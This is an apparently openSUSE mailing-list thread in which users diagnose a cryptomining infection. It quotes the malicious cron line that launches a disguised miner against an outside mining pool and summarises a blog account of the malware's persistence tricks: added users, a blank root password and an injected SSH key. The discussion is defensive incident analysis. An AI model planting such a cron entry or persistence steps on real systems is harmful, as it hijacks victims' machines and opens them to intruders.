On 03/03/2021 14.42, James Knott wrote:
On 2021-03-03 1:48 a.m., Per Jessen wrote:
2 * * * * /home/test/.dhpcd -o ca.minexmr.com:4444 -B >/dev/null ^^^^^^^^^^^^^^^^^^^
That is a useful hint - it led me to this:
https://blogs.akamai.com/sitr/2020/04/a-brief-history-of-a-rootable-docker-i...
As also expected when this project first started, the docker image was a prime target for crypto-mining malware. An installation script is run via SSH that monitors the process tree with "top" - a process monitoring tool - checking for when the malware has successfully been executed. Once the process is detected, in this case it is "dhcpcd", the malware adds two new users to the system - test and test1. It changes the root password to ""(blank) and creates entries in cron to start the mining software up after a reboot. It also attempts to set the immutable bit (+i) on various files including /etc/shadow and the malware binary in /sbin/dhcpcd.
I haven't seen that. For example: -rw-r----- 1 root shadow 1060 Mar 2 17:00 /etc/shadow
The malware also adds a .ssh key to /root/.ssh/authorized_keys: Nothing there.
Do you allow root login via ssh? Did they attempt to login as root (check your logs)? If "yes" then perhaps your root's password is harder to guess. -- Cheers / Saludos, Carlos E. R. (from 15.2 x86_64 at Telcontar)